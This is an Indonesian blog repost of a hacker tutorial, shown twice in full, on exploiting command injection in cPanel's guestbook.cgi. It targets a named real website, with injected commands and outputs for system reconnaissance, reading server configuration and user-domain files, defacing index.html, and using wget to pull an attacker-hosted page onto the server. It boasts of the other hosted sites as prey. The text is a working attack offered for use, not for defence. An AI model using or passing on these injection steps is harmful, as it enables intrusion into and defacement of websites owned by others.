Postingan
Mengeksploitasi Cpanel <= 5
CPanel adalah control panel untuk web-web hosting yang sangat populer..
hampir 80% web hosting menggunakan CPanel karena kemudahannya..
Di CPanel versi <= 5 (beberapa gw tes 5.3 bisa masuk juga), ada vulnerability
di guestbook.cgi CPanelnya yang memungkinkan semua orang untuk menginject code
dengan user id domain tersebut....
lebih lanjut...
OK.. sekarang kita cari target dulu...
untuk tau satu website itu diinstall cpanel ato gak, coba buka www.domain.com:2082 ato www.domain.com:2086 di browser.
ntar kalo diprompt untuk password, berarti terinstall sekaligus bisa check versi dari cpanel tersebut.
nach.. setelah dapat... kita inject aja code kita ke website itu.
-----------------
input: http://www.gamerxonline.com/cgi-sys/...ate=|uname+-a| --> masukkan ini ke browser
output: Linux host5.hostsoln.com 2.4.18-10 #1 Wed Aug 7 11:39:21 EDT 2002 i686 unknown
--------------------
wow... keren.. server linux + cpanel ada lubang
skrg kita coba liat kita dapat akses apa di server tersebut....
----------------
input: http://www.gamerxonline.com/cgi-sys/...&template=|id|
output: uid=32050(gamerx) gid=551(gamerx) groups=551(gamerx)
---------------
wach... cuman id biasa aja, gak ada root
tapi gak papa dengan id ini aja udah bisa deface site itu kekeke....
sekarang kita cari dimana home directory dari domain ini...
---------------
input: http://www.gamerxonline.com/cgi-sys/...ate=|ls+/home|
output: ... flange food fpa frankie frenzz fsguide gamerx giankc gideon glennng gotech gotrail griffin griffins h8mie...
--------------
tuch nampak di directory /home (yang ditebak) ada directory gamerx,..
kayaknya home directory dari website yang mau kita hajar...
coba liat lagi ke dalam.....
--------------
input: http://www.gamerxonline.com/cgi-sys/...+/home/gamerx|
output: IDM Michael Perlin Remy etc mail public_ftp public_html tmp www
--------------
siip... ada public_html
gw ingat di hosting hosting gratis.. biasanya file file ditaruh di sana...
tes lagi....
-------------
input: http://www.gamerxonline.com/cgi-sys/...x/public_html|
output: ADDONS-MODULES BLOCKS CHANGES COPYING CREDITS INSTALL PHP-Nuke-5.6.tar.gz README SUPPORT TODO TRANSLATIONS UPGRADE cgi-bin clans forum forums gamerx.gif gamerxenter.gif html index.html lan sql
---------------
mantapp... ini dia yang gw cari.. "index.html"
sekarang tinggal deface aja pake perintah echo macam zaman zaman unicode dulu
------------
input: http://www.gamerxonline.com/cgi-sys/guestbook.cgi?user=cpanel&template=|echo+Boom!+>+/home/gamerx/public_html/index.html|
output: lha... kok gak ada output?????
------------
grrr.... coba ke www.gamerxonline.com
wow.. nampak "Boom!" nya
kekekekekekeke... siip.. berhasil....
tunggu.. dulu... gw inget kalo web hostingan pasti ngehost banyak websites....
mmm....
coba check dech configurasi httpd.confnya, liat ada virtual2 hosts yg di host gak...
------------
input: http://www.gamerxonline.com/cgi-sys/...nf/httpd.conf|
output: .... .... etc... ... ServerAlias www.ourwedding-ceremony.com ourwedding-ceremony.com ServerAdmin webmaster@ourwedding-ceremony.com DocumentRoot /home/cmli/public_html .... etc ... etc....
------------
wow.. gila.. ada 300 lebih sites yang dihosting....
mangsa yang enak dimakan mwhahahahaha....
langsung nampak home directorynya lagi ama domain siip.. gak usah tebak tebak....
ato lebih mudah check /etc/userdomains (lebih simple)
---------------------
input: http://www.gamerxonline.com/cgi-sys/...c/userdomains|
[THX to AS_ROMA]
----------------------
heh.. lho.. kok kalo echo lebih dari 1 kata gak bisa??
aneh... padahal dulu zaman unicode bisa...
gini dech.. kita pake wget...
kamu masukkan file kamu di hosting hosting gratis....
terus input ini:
http://www.gamerxonline.com/cgi-sys/...ml/index.html|
siip.. siip.. sekarang 100 kata pun bukan jadi masalah lagi
Silahkan berpetualang!!! (Long Live Indonesian Hackers)
Regards,
Edelweize
http://www.indonesianhacker.org
CPanel adalah control panel untuk web-web hosting yang sangat populer..
hampir 80% web hosting menggunakan CPanel karena kemudahannya..
Di CPanel versi <= 5 (beberapa gw tes 5.3 bisa masuk juga), ada vulnerability
di guestbook.cgi CPanelnya yang memungkinkan semua orang untuk menginject code
dengan user id domain tersebut....
lebih lanjut...
OK.. sekarang kita cari target dulu...
untuk tau satu website itu diinstall cpanel ato gak, coba buka www.domain.com:2082 ato www.domain.com:2086 di browser.
ntar kalo diprompt untuk password, berarti terinstall sekaligus bisa check versi dari cpanel tersebut.
nach.. setelah dapat... kita inject aja code kita ke website itu.
-----------------
input: http://www.gamerxonline.com/cgi-sys/...ate=|uname+-a| --> masukkan ini ke browser
output: Linux host5.hostsoln.com 2.4.18-10 #1 Wed Aug 7 11:39:21 EDT 2002 i686 unknown
--------------------
wow... keren.. server linux + cpanel ada lubang
skrg kita coba liat kita dapat akses apa di server tersebut....
----------------
input: http://www.gamerxonline.com/cgi-sys/...&template=|id|
output: uid=32050(gamerx) gid=551(gamerx) groups=551(gamerx)
---------------
wach... cuman id biasa aja, gak ada root
tapi gak papa dengan id ini aja udah bisa deface site itu kekeke....
sekarang kita cari dimana home directory dari domain ini...
---------------
input: http://www.gamerxonline.com/cgi-sys/...ate=|ls+/home|
output: ... flange food fpa frankie frenzz fsguide gamerx giankc gideon glennng gotech gotrail griffin griffins h8mie...
--------------
tuch nampak di directory /home (yang ditebak) ada directory gamerx,..
kayaknya home directory dari website yang mau kita hajar...
coba liat lagi ke dalam.....
--------------
input: http://www.gamerxonline.com/cgi-sys/...+/home/gamerx|
output: IDM Michael Perlin Remy etc mail public_ftp public_html tmp www
--------------
siip... ada public_html
gw ingat di hosting hosting gratis.. biasanya file file ditaruh di sana...
tes lagi....
-------------
input: http://www.gamerxonline.com/cgi-sys/...x/public_html|
output: ADDONS-MODULES BLOCKS CHANGES COPYING CREDITS INSTALL PHP-Nuke-5.6.tar.gz README SUPPORT TODO TRANSLATIONS UPGRADE cgi-bin clans forum forums gamerx.gif gamerxenter.gif html index.html lan sql
---------------
mantapp... ini dia yang gw cari.. "index.html"
sekarang tinggal deface aja pake perintah echo macam zaman zaman unicode dulu
------------
input: http://www.gamerxonline.com/cgi-sys/guestbook.cgi?user=cpanel&template=|echo+Boom!+>+/home/gamerx/public_html/index.html|
output: lha... kok gak ada output?????
------------
grrr.... coba ke www.gamerxonline.com
wow.. nampak "Boom!" nya
kekekekekekeke... siip.. berhasil....
tunggu.. dulu... gw inget kalo web hostingan pasti ngehost banyak websites....
mmm....
coba check dech configurasi httpd.confnya, liat ada virtual2 hosts yg di host gak...
------------
input: http://www.gamerxonline.com/cgi-sys/...nf/httpd.conf|
output: .... .... etc... ... ServerAlias www.ourwedding-ceremony.com ourwedding-ceremony.com ServerAdmin webmaster@ourwedding-ceremony.com DocumentRoot /home/cmli/public_html .... etc ... etc....
------------
wow.. gila.. ada 300 lebih sites yang dihosting....
mangsa yang enak dimakan mwhahahahaha....
langsung nampak home directorynya lagi ama domain siip.. gak usah tebak tebak....
ato lebih mudah check /etc/userdomains (lebih simple)
---------------------
input: http://www.gamerxonline.com/cgi-sys/...c/userdomains|
[THX to AS_ROMA]
----------------------
heh.. lho.. kok kalo echo lebih dari 1 kata gak bisa??
aneh... padahal dulu zaman unicode bisa...
gini dech.. kita pake wget...
kamu masukkan file kamu di hosting hosting gratis....
terus input ini:
http://www.gamerxonline.com/cgi-sys/...ml/index.html|
siip.. siip.. sekarang 100 kata pun bukan jadi masalah lagi
Silahkan berpetualang!!! (Long Live Indonesian Hackers)
Regards,
Edelweize
http://www.indonesianhacker.org
Anda baru saja membaca artikel yang berkategori dengan judul Mengexploitasi Cpanel. Anda bisa bookmark halaman ini dengan URL http://blogku-duniaku.blogspot.com/2010/01/mengexploitasi-cpanel.html. Terima kasih!
Ditulis oleh:
zenonk - Minggu, 31 Januari 2010
kowkwokwow sih Edelwieze sih Sempak Mekar.... :ngakak
BalasHapus